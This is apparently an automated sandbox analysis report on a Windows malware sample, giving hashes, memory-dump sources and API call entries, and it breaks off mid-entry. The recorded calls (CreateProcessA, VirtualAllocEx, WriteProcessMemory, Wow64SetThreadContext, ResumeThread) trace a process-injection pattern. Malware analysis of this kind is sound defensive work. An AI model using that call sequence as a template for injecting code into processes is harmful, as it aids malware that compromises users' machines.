                                        • API String ID: 0-3823777903
                                        • Opcode ID: 593036de47e32530b2ef7c0682ffbf0eaf4807d18051bc620674a685ba970263
                                        • Instruction ID: c2c5dcfb4a83050df027d805ce0c5f847905a723390ea336003fcd693b396ba8
                                        • Opcode Fuzzy Hash: 593036de47e32530b2ef7c0682ffbf0eaf4807d18051bc620674a685ba970263
                                        • Instruction Fuzzy Hash: EA913C30E02309DFEB68DB69D558BAEBBB2EF84341F108529D8019F294DB759D85CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-390881366
                                        • Opcode ID: 2f12a5b46d16c386cb8c2fad4e092a1d7841e9e6b0a51fb0fd6376eb47006986
                                        • Instruction ID: e9b9f65f5525ff676888482007f298407c6036771c473921c89533f254779a41
                                        • Opcode Fuzzy Hash: 2f12a5b46d16c386cb8c2fad4e092a1d7841e9e6b0a51fb0fd6376eb47006986
                                        • Instruction Fuzzy Hash: 63F14A34B01309CFDB58EB69D594A6EBBB6FF84340F208569D4099F368CB359C86CB81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2392861976
                                        • Opcode ID: d9bf76219fcdb0789fcc030480097fc60d95caf9a39d8ddfa5ae88759e8375b7
                                        • Instruction ID: 632d7176c2d3b8c68b7fb63b0aba0b21ba3c51cd1ae26b626c72352aeeaa0648
                                        • Opcode Fuzzy Hash: d9bf76219fcdb0789fcc030480097fc60d95caf9a39d8ddfa5ae88759e8375b7
                                        • Instruction Fuzzy Hash: 5A716A31E0020ACFDBA8DFA9D5546AEB7F2FF84350B108969D40ADF294DB719D46CB81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: 31bc43511d43985c457d13a9f2e64b7b58b4b28bdf77d79f7bf7bebb36a0a08d
                                        • Instruction ID: a379a67725928edc5e3de10043c467ad6c272fe28c2c653ac34a96be490d3190
                                        • Opcode Fuzzy Hash: 31bc43511d43985c457d13a9f2e64b7b58b4b28bdf77d79f7bf7bebb36a0a08d
                                        • Instruction Fuzzy Hash: D2B12730F012198FDB54EB69D69469EBBB2FF84390F248929D4169F394DB35DC86CB80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LR^q$LR^q$$^q$$^q
                                        • API String ID: 0-2454687669
                                        • Opcode ID: 03a4274c2ee41426b55c9bd86a94b44c8a9774bc253ddccc540daf0fcbbd9c7b
                                        • Instruction ID: 94977e64d6976a39996750d83f83b0d3332d7c5992a72ca115ae3977c1845a1d
                                        • Opcode Fuzzy Hash: 03a4274c2ee41426b55c9bd86a94b44c8a9774bc253ddccc540daf0fcbbd9c7b
                                        • Instruction Fuzzy Hash: 0151E530B002029FDB54DB28DA94A6E77E6FF88780F148569D415DF3A9DB35EC41CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: bac9412e43d400d3db169d08810434f34a708ec975d9cb4c7838e730eba55194
                                        • Instruction ID: 3f9fff95929da9b5a66f5902d6daaad2b5fe92b15a6a9fabf67e0bc78b97716f
                                        • Opcode Fuzzy Hash: bac9412e43d400d3db169d08810434f34a708ec975d9cb4c7838e730eba55194
                                        • Instruction Fuzzy Hash: 4851BD34F12304DFCBA5DA68E5806AEB7B2EB88390F10852AD415DF354DB31DC86CB90

                                        Execution Graph

                                        Execution Coverage:11.7%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:291
                                        Total number of Limit Nodes:16

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05421EE2
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1987546993.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_5420000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 4a207d1a3bca50bd5a3a6ea520dbe18e8b82517d6576c0233e8ad475ba2d3aa0
                                        • Instruction ID: c6dae0d20d49a7d4b89ec538be3c1e895da484c51688e62feb66c89b343281ea
                                        • Opcode Fuzzy Hash: 4a207d1a3bca50bd5a3a6ea520dbe18e8b82517d6576c0233e8ad475ba2d3aa0
                                        • Instruction Fuzzy Hash: F06112B2C00259EFDF01CFA9C980ADEBFB2BF48350F15916AE818AB260D7759945CF50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        • Wow64SetThreadContext.KERNELBASE(?,00000000), ref: 072709DE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID: W
                                        • API String ID: 983334009-655174618
                                        • Opcode ID: 82f362168dbc618de80577ae0cb0ecee6e2ada3784a3e3e4897f3baeda8adb82
                                        • Instruction ID: 639a8d0c05f12d95a0a529853ce56b3f91cf14465e1664482cd5cd567d4f63d8
                                        • Opcode Fuzzy Hash: 82f362168dbc618de80577ae0cb0ecee6e2ada3784a3e3e4897f3baeda8adb82
                                        • Instruction Fuzzy Hash: DB2118B1900209CFDB10DFA9C5857EEBBF4AF48364F14842AD499A7241CB789A85CF94

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07271826
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: a01a4f5770fc08a632edde98aa2a03a03a05050ad3308984195a19461e4158f5
                                        • Instruction ID: 35888ad1df6626165f0c6373d223591e5c88e88a60f713d0ae6109c7037bdc36
                                        • Opcode Fuzzy Hash: a01a4f5770fc08a632edde98aa2a03a03a05050ad3308984195a19461e4158f5
                                        • Instruction Fuzzy Hash: 52A15EB1D1021EDFDB10CF68C9417DDBBB6BF88314F1481A9E848A7250DB749995CF92

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07271826
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 0d0314c20f165679a543a9cc2d6a6309672f112034d48e9a215b12454e114731
                                        • Instruction ID: e1951d44f8794fce6747263c806d8d5ecee0f43b35853638f1c8287fe89fffc7
                                        • Opcode Fuzzy Hash: 0d0314c20f165679a543a9cc2d6a6309672f112034d48e9a215b12454e114731
                                        • Instruction Fuzzy Hash: 5A916DB1D1021EDFEB10CF68C941BDDBBB6BF88314F1481A9E848A7240DB749995CF92

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02CDB3BE
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1978392701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_2cd0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: fb0e57e2483d7af6e560b818fdf3a48975b3dd059fecd0b91b94629ebd57d6a2
                                        • Instruction ID: bcb7e6cd070852112ed76332752b3ebe06cf552bc8f2a5f8da95f7a137d903b2
                                        • Opcode Fuzzy Hash: fb0e57e2483d7af6e560b818fdf3a48975b3dd059fecd0b91b94629ebd57d6a2
                                        • Instruction Fuzzy Hash: 1A812271A00B058FD724DF6AD54575ABBF1FF88308F008A2DD58ADBA50DB34E945CB90

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05421EE2
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1987546993.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_5420000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 55869695bc4323d4b03bcc0514a2ac8fd6d3765f8417343a2a0c19f6e211c96c
                                        • Instruction ID: 414a6a89ed6dc1f0924840d822a694bf496e94722673f4ee1368ac2ef52190b9
                                        • Opcode Fuzzy Hash: 55869695bc4323d4b03bcc0514a2ac8fd6d3765f8417343a2a0c19f6e211c96c
                                        • Instruction Fuzzy Hash: B441BEB1D00359DFDB14CFA9C884ADEBBB5BF48310F64812AE819AB214D771A885CF91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 02CD5F31
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1978392701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_2cd0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: ea34191b73b27736b86c344cd64a3bafee640c5ff9d8f3e4fbed54d0367c64ae
                                        • Instruction ID: cf5ebd3ca17459d9ce45ba2fb2afd619673ef4b815ff89ce396b7c11f55e5ffb
                                        • Opcode Fuzzy Hash: ea34191b73b27736b86c344cd64a3bafee640c5ff9d8f3e4fbed54d0367c64ae
                                        • Instruction Fuzzy Hash: 2B41EFB0C00619CADB24CFA9C884B9EBBF5BF88304F60806AD408AB255DB756945CF91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 02CD5F31
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1978392701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_2cd0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 7dd9aaaf7543900e830cbcdb49a5ae7b4664987eda24ed0cfaa1b7ddb42e8dd1
                                        • Instruction ID: 010c032dc4c4e9051dd661991c03682d7f1cdf0931c286e0fd3db69923234348
                                        • Opcode Fuzzy Hash: 7dd9aaaf7543900e830cbcdb49a5ae7b4664987eda24ed0cfaa1b7ddb42e8dd1
                                        • Instruction Fuzzy Hash: 9C41DFB0C00619CADB24CFA9C984B9EBBF5FF49304F64806AD408AB255DB756945CF91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 054245F1
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1987546993.0000000005420000.00000040.00000800.00020000.00000000.sdmp, Offset: 05420000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_5420000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0
                                        • Opcode ID: 9e76bb4f29a121090623ba2ee6b4715cb5e2a968495fa011f900f57bb7d5294c
                                        • Instruction ID: 782f2739c4f456604fb166751f3c70cf6aec954459a5ae8943605901dd75410e
                                        • Opcode Fuzzy Hash: 9e76bb4f29a121090623ba2ee6b4715cb5e2a968495fa011f900f57bb7d5294c
                                        • Instruction Fuzzy Hash: 5B4118B8900215CFCB14CF99C488AAABBF5FB88314F24C45DE559AB321D775A841CFA0
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072713F8
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 537e2ecffbf9c1f6b82e254b1fd3d357f0e9808a0783b4b9ed39d768eb27ad03
                                        • Instruction ID: 328003aef4ae2457ad38fc2cbf18cd03ef59e689bb1ea7365b36dee255e91082
                                        • Opcode Fuzzy Hash: 537e2ecffbf9c1f6b82e254b1fd3d357f0e9808a0783b4b9ed39d768eb27ad03
                                        • Instruction Fuzzy Hash: 222157B1900359DFDB10CFA9C980BEEBBF1FF88310F10842AE959A7250D7789954CBA4
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072713F8
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: fda9f0952b11bfe44130721cb4da7d9179427204fbded5db73e31bc7b2fee004
                                        • Instruction ID: 74bfe8883b152823a7b4cf94843a898f7154228c3adaaabf8fb2a040c3e96fd2
                                        • Opcode Fuzzy Hash: fda9f0952b11bfe44130721cb4da7d9179427204fbded5db73e31bc7b2fee004
                                        • Instruction Fuzzy Hash: 692155B190035D9FCB10CFAAC981BDEBBF5FF88310F10842AE959A7240D7789954CBA4
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072714D8
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 2d2119d888cf6edba43a20d2ef3f73008f070b910a4122f763e1a829be0344a2
                                        • Instruction ID: c6a403fa5faf08c5c2557efd567e9d96ce1f99efcefe06c6489f942a3d70366a
                                        • Opcode Fuzzy Hash: 2d2119d888cf6edba43a20d2ef3f73008f070b910a4122f763e1a829be0344a2
                                        • Instruction Fuzzy Hash: 5B2136B1900259DFCB10DFAAC981BEEBBF1FF48310F10842AE958A7250D7789955CFA4
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02CDDA0E,?,?,?,?,?), ref: 02CDDACF
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1978392701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_2cd0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 3cd02eadc631dd4182c317d1e0001a33f9b76807b46b250d1bffe64abbfd3460
                                        • Instruction ID: 9408acb877a9dc14d313d44dfd3170713f60da893095390c0e44f3db509f251c
                                        • Opcode Fuzzy Hash: 3cd02eadc631dd4182c317d1e0001a33f9b76807b46b250d1bffe64abbfd3460
                                        • Instruction Fuzzy Hash: E521E3B5D002499FDB10CFAAD584ADEBFF4FB48310F14801AE959A7310D374A950CFA4
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072714D8
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 8417846faf190d17ecf6679b1689fa27a9985c289a8caaac2bb267ccf50ac31a
                                        • Instruction ID: 80a5f04e4f24390cf31247c9705213923d2b52c2e088d82e8d3e2bbee1293d3e
                                        • Opcode Fuzzy Hash: 8417846faf190d17ecf6679b1689fa27a9985c289a8caaac2bb267ccf50ac31a
                                        • Instruction Fuzzy Hash: B92139B190035D9FCB10DFAAC941ADEFBF5FF48310F508429E559A7250D7349554CBA4
                                        APIs
                                        • Wow64SetThreadContext.KERNELBASE(?,00000000), ref: 072709DE
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 0f0bececc2b78ba14527dd8808e68c06ca684a8d761284d6835a122824d983b1
                                        • Instruction ID: f9475f8cab4c3d30761f16adaac630af432616bee34d6ed0c115ece6aba02d15
                                        • Opcode Fuzzy Hash: 0f0bececc2b78ba14527dd8808e68c06ca684a8d761284d6835a122824d983b1
                                        • Instruction Fuzzy Hash: EE212CB1900309CFDB10DFAAC5857EEBBF4EF49324F148429D459A7240D7789945CFA5
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02CDDA0E,?,?,?,?,?), ref: 02CDDACF
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1978392701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_2cd0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 62431fbe92e4e5fdbee0c6297fa19120dc065dcc39a723d6a02b7ea0cff4e015
                                        • Instruction ID: a9ac2667f000344d631113c1b478193173ed299fa7988df831e83a290a186bd7
                                        • Opcode Fuzzy Hash: 62431fbe92e4e5fdbee0c6297fa19120dc065dcc39a723d6a02b7ea0cff4e015
                                        • Instruction Fuzzy Hash: 9121F3B6D00218DFDB10CFA9D584AEEBBF4FB48310F14841AE958A7350D378AA50CF64
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07271316
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: e6dcba322725dde2dfc7126fbd7ab53e9c312bb4f5a2541f39d0c04459d7b0c7
                                        • Instruction ID: 08992c5329120839024b78cb7d541aaeac17bad432c40826c9ce12ed1cd83b43
                                        • Opcode Fuzzy Hash: e6dcba322725dde2dfc7126fbd7ab53e9c312bb4f5a2541f39d0c04459d7b0c7
                                        • Instruction Fuzzy Hash: 931164B28002499FCB10DFAAC844BDFBFF5EF88320F208819E559A7250C735A950CFA4
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07271316
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 36cedcaaa6add800505677e2b751e9ac1ef07051a5a4292864b962a77c125e17
                                        • Instruction ID: f3501ed72d7ad079d715c7053f3e9c54cb58029cc91aa0a9d65b0695781f4572
                                        • Opcode Fuzzy Hash: 36cedcaaa6add800505677e2b751e9ac1ef07051a5a4292864b962a77c125e17
                                        • Instruction Fuzzy Hash: 481164B6800249CFCB10DFA9C945BEEBFF5EF88320F24881AE559A7250C7359550CFA0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 5a0b32410514c9c0f08e73ae5d63e2a9794ceb01039e0889ea22edba8d6ce69a
                                        • Instruction ID: d59eb9aa1e2f0734de20c971909530e71b4d0a46c8fb037b2335b2e07750d3ac
                                        • Opcode Fuzzy Hash: 5a0b32410514c9c0f08e73ae5d63e2a9794ceb01039e0889ea22edba8d6ce69a
                                        • Instruction Fuzzy Hash: F81128B1900259CFDB20DFA9C5447EFFBF5EB88324F24842AD459A7250C7755944CF94
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 3ff100878ed0d78498693b0fa56d2692f14010238875de11266b39f14c6c7a6d
                                        • Instruction ID: f74dfb83f6ba74db3ecff06b05462071041a03c9cb5f3ebb2cbfe2fc98c26278
                                        • Opcode Fuzzy Hash: 3ff100878ed0d78498693b0fa56d2692f14010238875de11266b39f14c6c7a6d
                                        • Instruction Fuzzy Hash: 8A1136B1900249CFDB20DFAAC4457EFFBF4EB88324F248429D459A7250CB75A944CFA4
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07274F8D
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 1184ded7182a8b5a27471801a584467443c8569ba4c9484631c486959bf1392f
                                        • Instruction ID: 8f3c83fcb75267832a814909afe423bde689ffd965eff6d4d6416a53dd1af515
                                        • Opcode Fuzzy Hash: 1184ded7182a8b5a27471801a584467443c8569ba4c9484631c486959bf1392f
                                        • Instruction Fuzzy Hash: AA1103B5810349DFDB10DF9AD989BDEBBF8FB48320F20841AE558A7210C375A944CFA5
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02CDB3BE
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1978392701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_2cd0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: b0bd4bfa5890ced4b7bc3f38a29cf9f5a11a2fc17d7e9866531e1b13038b611b
                                        • Instruction ID: d22c54e290559489b655b73504fd1bacbe4ad438472eff4d0d6aadc00363e515
                                        • Opcode Fuzzy Hash: b0bd4bfa5890ced4b7bc3f38a29cf9f5a11a2fc17d7e9866531e1b13038b611b
                                        • Instruction Fuzzy Hash: 791110B5C002498FCB10CF9AC444ADEFBF4AF88328F11842AD559A7210C375A545CFA1
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 07274F8D
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1989903821.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_7270000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: e95cc8cf1d1562ff3ea02afac6ff787337d7547248a540f3261582cd983b6843
                                        • Instruction ID: ecdcb51ffd80290b373ed22b06e8835d48e4e14b03d56226225d55341c4c30db
                                        • Opcode Fuzzy Hash: e95cc8cf1d1562ff3ea02afac6ff787337d7547248a540f3261582cd983b6843
                                        • Instruction Fuzzy Hash: B011FEB5800249DFDB10DF9AD585BEEBBF8FB48320F20841AE558A7210D375A984CFA5
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1978028705.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_135d000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 52bd5b2d2fe796e3a15039347b645bb4f94c2e7b75edff74aa1ddae65db6ce64
                                        • Instruction ID: 24768dfe764fadd9fb25fbc7600a5ef30a4e5c14ae70ec1366f301134e304ba4
                                        • Opcode Fuzzy Hash: 52bd5b2d2fe796e3a15039347b645bb4f94c2e7b75edff74aa1ddae65db6ce64
                                        • Instruction Fuzzy Hash: 34210071604204DFDB55DF58D984F26BBA5EB84B18F20C569DC0A4B256C33AD447CA61
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1978028705.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_135d000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb27c22c867705799f94c7498fe7f29a1ba2199b25176884e95cc5e95bc00ad6
                                        • Instruction ID: c3ee4896247a0d76e1554c2fd648679fa2710ddf1dc6ba8c48687fbf5a3d59c6
                                        • Opcode Fuzzy Hash: bb27c22c867705799f94c7498fe7f29a1ba2199b25176884e95cc5e95bc00ad6
                                        • Instruction Fuzzy Hash: 7A21A1755093808FDB03CF24D994B15BF71EB45218F28C5EAD8498F2A7C33AD40ACB62
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1977944695.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_134d000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 13b9e57387a81f6bb4db03f4544a3af26ff7625a87f615c9ff7be36323084e3d
                                        • Instruction ID: dbdd08610396583ffeb6c064379dfc9fcd40aa923c453d23212beddbecb8a914
                                        • Opcode Fuzzy Hash: 13b9e57387a81f6bb4db03f4544a3af26ff7625a87f615c9ff7be36323084e3d
                                        • Instruction Fuzzy Hash: 3A01F7310083849BE710CE69CDC4B67FFDCEF51368F18C42AED094A292C239E840C671
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1977944695.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_25_2_134d000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
